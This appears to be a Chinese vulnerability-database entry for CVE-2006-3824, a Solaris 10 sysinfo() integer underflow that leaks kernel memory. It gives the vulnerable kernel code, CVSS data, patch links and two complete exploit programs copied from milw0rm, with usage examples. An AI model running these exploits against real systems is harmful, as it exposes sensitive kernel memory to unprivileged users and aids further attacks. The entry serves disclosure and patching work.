CVE-2006-3824
CVSS4.9
发布时间 :2006-07-25 09:22:00
修订时间 :2011-03-07 21:39:33
NMCOES    

[原文]systeminfo.c for Sun Solaris allows local users to read kernel memory via a 0 variable count argument to the sysinfo system call, which causes a -1 argument to be used by the copyout function. NOTE: this issue has been referred to as an integer overflow, but it is probably more like a signedness error or integer underflow.


[CNNVD]Sun sysinfo() Kernel内存信息泄露漏洞(CNNVD-200607-411)

        Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
        Solaris的/usr/src/uts/common/syscall/systeminfo.c文件中存在整数溢出漏洞,可能导致内核信息泄露。
        漏洞相关的代码如下:
        125 if (kstr != NULL) {
        126 if ((strcnt = strlen(kstr)) >= count) {
        127 getcnt = count - 1;
        128 if (subyte(buf + count - 1, 0) < 0)
        129 return (set_errno (EFAULT));
        130 } else
        131 getcnt = strcnt + 1;
        132 if (copyout(kstr, buf, getcnt))
        133 return (set_errno(EFAULT));
        134 return (strcnt + 1);
        135 }
        如果由用户提供的变量count为0的话,函数就会以-1长度参数调用copyout函数。由于copyout将长度参数解释为无符整数,因此就会将大量数据拷贝到用户空间,导致攻击者可以读取敏感的Kernel内存。
        
        

- CVSS (基础分值)

CVSS分值: 4.9 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:10.0::sparc
cpe:/o:sun:solaris:10.0::x86

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3824
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3824
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-411
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/19104
(PATCH)  BID  19104
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
(PATCH)  MISC  http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
http://www.vupen.com/english/advisories/2006/2936
(UNKNOWN)  VUPEN  ADV-2006-2936
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=410
(UNKNOWN)  IDEFENSE  20060720 Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://xforce.iss.net/xforce/xfdb/27901
(UNKNOWN)  XF  solaris-systeminfo-overflow(27901)
http://www.securityfocus.com/archive/1/archive/1/440986/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060724 Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://www.securityfocus.com/archive/1/archive/1/440849/100/100/threaded
(UNKNOWN)  BUGTRAQ  20060721 Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
http://securitytracker.com/id?1016555
(UNKNOWN)  SECTRACK  1016555
http://secunia.com/advisories/21148
(UNKNOWN)  SECUNIA  21148

- 漏洞信息

Sun sysinfo() Kernel内存信息泄露漏洞
中危 缓冲区溢出
2006-07-25 00:00:00 2006-07-26 00:00:00
本地  
        Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
        Solaris的/usr/src/uts/common/syscall/systeminfo.c文件中存在整数溢出漏洞,可能导致内核信息泄露。
        漏洞相关的代码如下:
        125 if (kstr != NULL) {
        126 if ((strcnt = strlen(kstr)) >= count) {
        127 getcnt = count - 1;
        128 if (subyte(buf + count - 1, 0) < 0)
        129 return (set_errno (EFAULT));
        130 } else
        131 getcnt = strcnt + 1;
        132 if (copyout(kstr, buf, getcnt))
        133 return (set_errno(EFAULT));
        134 return (strcnt + 1);
        135 }
        如果由用户提供的变量count为0的话,函数就会以-1长度参数调用copyout函数。由于copyout将长度参数解释为无符整数,因此就会将大量数据拷贝到用户空间,导致攻击者可以读取敏感的Kernel内存。
        
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102343-1

- 漏洞信息 (2067)

Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit (EDBID:2067)
solaris local
2006-07-24 Verified
0 prdelka
N/A [点击下载]
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from a
 * non-privileged userspace process. The vulnerability specifically exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
        int fd;
 	ssize_t out;
        char* output_buffer;
	if(argc < 2){
		printf("[ Use with <filepath>\n");
		exit(1);
	}
        printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
	output_buffer = malloc(bufsize);
        memset(output_buffer,0,bufsize);
        sysinfo(SI_SYSNAME,output_buffer,0);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
	if(fd!=-1){
	        out = write(fd,output_buffer,bufsize);
		printf("[ Wrote %u bytes to %s\n",out,argv[1]);
	        close(fd);
	}
        exit(0);
}

// milw0rm.com [2006-07-24]
		

- 漏洞信息 (2241)

Solaris 10 sysinfo(2) Local Kernel Memory Disclosure Exploit (EDBID:2241)
solaris local
2006-08-22 Verified
0 Marco Ivaldi
N/A [点击下载]
/*
 * $Id: raptor_sysinfo.c,v 1.2 2006/08/22 13:47:54 raptor Exp $
 *
 * raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak
 * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * systeminfo.c for Sun Solaris allows local users to read kernel memory via 
 * a 0 variable count argument to the sysinfo system call, which causes a -1 
 * argument to be used by the copyout function. NOTE: this issue has been 
 * referred to as an integer overflow, but it is probably more like a 
 * signedness error or integer underflow (CVE-2006-3824).
 *
 * http://en.wikipedia.org/wiki/Pitagora_Suicchi
 *
 * Greets to prdelka, who also exploited this vulnerability.
 *
 * I should also definitely investigate the old sysinfo(2) vulnerability 
 * described in CVE-2003-1062, affecting Solaris/SPARC 2.6 through 9 and 
 * Solaris/x86 2.6 through 8... It may come in handy sooner or later;)
 *
 * Usage:
 * $ gcc raptor_sysinfo.c -o raptor_sysinfo -Wall
 * $ ./raptor_sysinfo kerndump 666666
 * [...]
 * $ ls -l kerndump 
 * -rwx------   1 raptor   other     666666 Aug 22 14:41 kerndump
 *
 * Vulnerable platforms (SPARC):
 * Solaris 10 without patch 118833-09 [tested]
 *
 * Vulnerable platforms (x86):
 * Solaris 10 without patch 118855-06 [untested]
 */

#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define	INFO1	"raptor_sysinfo.c - Solaris sysinfo(2) kernel memory leak"
#define	INFO2	"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define BUFSIZE 536870911

int 	errno;

int main(int argc, char **argv)
{
	int 	fd;
	size_t	out, bufsize = BUFSIZE;
	char	*buf;

	/* print exploit information */
	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

	/* read command line */
	if (argc < 2) {
		fprintf(stderr, "usage: %s outfile [outsize]\n\n", argv[0]);
		exit(1);
	}
	if (argc > 2)
		if ((bufsize = atoi(argv[2])) == 0) {
			fprintf(stderr, "Error (atoi): invalid outsize\n");
			exit(1);
		}

	/* print some output */
	fprintf(stderr, "Using outfile\t: %s\n", argv[1]);
	fprintf(stderr, "Using outsize\t: %u\n\n", bufsize);

	/* prepare the output buffer */
	if ((buf = (char *)malloc(bufsize)) == NULL) {
		perror("Error (malloc)");
		fprintf(stderr, "Hint: Try again with a smaller output size\n");
		exit(1);
	}
	memset(buf, 0, bufsize);

	/* Pitagora Suicchi! */
	sysinfo(SI_SYSNAME, buf, 0);

	/* save output to outfile */
	if ((fd = open(argv[1], O_RDWR | O_CREAT | O_TRUNC, 0700)) < 0) {
		perror("Error (open)");
		free(buf);
		exit(1);
	}
	out = write(fd, buf, bufsize);
	fprintf(stderr, "Pitagora Suicchi! %u bytes written to %s\n", out, argv[1]);
	fprintf(stderr, "Hint: Try also with a bigger output size\n");

	close(fd);
	free(buf);

	exit(0);
}

// milw0rm.com [2006-08-22]
		

- 漏洞信息

27438
Solaris sysinfo() Overflow Kernel Memory Disclosure
Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

- 时间线

2006-07-20 Unknow
2006-07-21 2006-07-21

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sun Solaris SysInfo Local Information Disclosure Vulnerability
Design Error 19104
No Yes
2006-07-21 12:00:00 2007-06-27 03:48:00
The original discoverer of this vulnerability wishes to remain anonymous. iDefense reported this issue to the vendor.

- 受影响的程序版本

Sun Solaris 10_x86
Sun Solaris 10
Avaya Interactive Response

- 漏洞讨论

Sun Solaris is prone to a local information-disclosure vulnerability because the kernel fails to properly ensure that unintended memory is not disclosed to local users.

This issue allows local attackers to gain access to potentially sensitive kernel memory. Information harvested by exploiting this issue may aid attackers in further attacks.

- 漏洞利用

The following exploits are available:

- 解决方案

Sun has released a security alert along with patches to address this issue. Please see the referenced alert for more information.


Sun Solaris 10

Sun Solaris 10_x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站